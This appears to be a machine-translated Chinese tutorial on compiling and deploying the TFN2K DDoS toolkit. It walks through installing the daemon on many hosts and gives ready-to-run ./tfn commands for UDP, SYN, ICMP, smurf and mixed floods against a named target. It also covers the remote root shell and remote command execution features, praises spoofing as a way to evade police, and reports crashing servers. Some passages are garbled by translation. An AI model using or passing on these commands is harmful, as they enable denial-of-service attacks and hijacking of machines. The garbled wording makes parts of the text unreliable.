软件使用的是最有名的DDOS。 首先,我们将使用目前最有名的REDHAT Linux测试我们用于攻击的客户端和服务器的放置方式。 这次攻击测试使用FEDORA CORE3。
开始设置服务器:
解压tar -zxvf tfn2k.tgz
安装TFN2K
TFN2K是开源软件,需要我们进行编译。 这个当然也可以编译吧,但是必须注意几点。 因为使用不同版本和制造商的Linux需要不同的设置。
首先修改src/ip.h
注释掉以下部分。 否则会出现编译错误。
/*struct in_addr
{
unsigned long int s_addr;
(; */
然后make编译
编译时会提示服务器端输入8-32位的密码设置。 (攻击时需要输入密码。 )编译后,将出现两个新的可执行文件td和tfn。 其中,td既是守护进程,也是客户端的使用进程。 另一方面,tfn是服务器控制进程,如果想攻击他人,则必须启动名为td的进程,然后运行服务器进程。 否则攻击将无效,更改密码后可以运行mkpass进行更改。 最后,在所有客户端上安装并运行td (需要ROOT权限),并在服务器上创建文本文件。 文件中记录了所有客户端IP地址。 用VI编辑就可以了。 形式是:
192.168.0.1
192.168.0.2
192.168.0.3
国际空间站
国际空间站
.
然后在主服务器上运行./tfn
2.DDOS攻击的实现
./tfn直接回到车上,你会看到一些参数。 英语好的朋友我觉得不需要多说。 )
格式./tfn
不提无用的参数。 对我们来说是攻击用的
-f这个参数后面跟刚才写的文本文件名,实际上是实现DDOS攻击,而不是DOS
-h DOS攻击,即独立攻击,一对一攻击后跟有主机或IP地址
在-p后面指定端口。 当然了
-c最重要的参数共有11个选择相
0 -为了停止攻击,拿出善心
1 -设置反欺诈级别。 名为TFN的工具在攻击时发出的数据包带有源地址,但源地址是随机的。 也就是说,地址不是你自给的,所以不用担心警察会抓住你。 哈哈
2 -重组数据包的数据包大小: ICMP/8、smurf和udp攻击缺省使用最小数据包。 可以通过改变每个包的有效载荷的字节来增加大小。
3 -绑定根shell :以启动会话服务,并连接到指定端口以获得根shell。
4 - udp洪水攻击:此攻击利用的事实是,每个UDP数据包都将被发送到一个关闭的端口,返回ICMP无法到达的信息,从而提高攻击能力。
5 - SYN洪水攻击:该攻击有规律地发送虚假连接请求。 结果,目标端口拒绝服务、隐藏TCP连接表并通过回复不存在主机的TCP/RST来增加攻击的可能性,成为标准的拒绝服务攻击。
6 - ICMP响应(ping )攻击:该攻击发送对虚拟地址的ping请求,从而导致目标主机发送回大小相同的响应包。
7 - SMURF攻击:用目标主机地址发送ping请求并广播扩展,使目标主机收到多倍的回复。
8 - MIX攻击:通过以13:1:1的关系交替发送udp、syn、icmp数据包,来应对路由器、其他数据包转发设备、NIDS、sniffers等(3360 )
9 -目标3攻击
10 -远程命令执行,该参数是TFN的附加功能,实际上TFN的攻击不仅是DOS,还可以远程明确地控制,例如:
./tfn-fhost ext-C10-I ' mkdir/root/Edison '在所有主机的根目录中创建Edison,并在-I后添加“命令”
参数基本结束,下一次攻击
./tfn -f hostext -c 4 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行UDP攻击(所有主机上必须启动td进程)
./tfn-fhost ext-C5-iwww.XXX.com-p80
使用hostext文件中记录的主机对163服务器进行TCP拒绝服务攻击(80web攻击,当然还有其他) )。
./tfn -f hostext -c 6 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出会立即死机) )。
./tfn -f hostext -c 8 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行ICMPTCPUDP轮转攻击(如果对方是sniffer,一定会哭死)
./tfn -f hostext -c 0
让拥有的主机停止攻击
基本上最后说一下我的测试结果
一对一攻击,攻击方式TCP连接方式本地CPU13%被攻击的服务器CPU使用率70%以上,有时会变动
2对1攻击,攻击方式TCP连接方式本地单体CPU13%被攻击的服务器CPU使用率100%
五对一攻击,攻击方式TCP连接方式本地独立CPU13%被攻击的服务器死机。 本人家里只有6台机器,如果是更多几十台机器,普通的个人服务器肯定会死
一对一攻击,攻击方式ICMP连接方式本地CPU18%被攻击的服务器CPU的使用率在96%以上,经常变动2对1攻击。 攻击方式ICMP连接方式本地单体CPU18%被攻击的服务器无法连接互联网,几乎无法使用,30分钟内死机。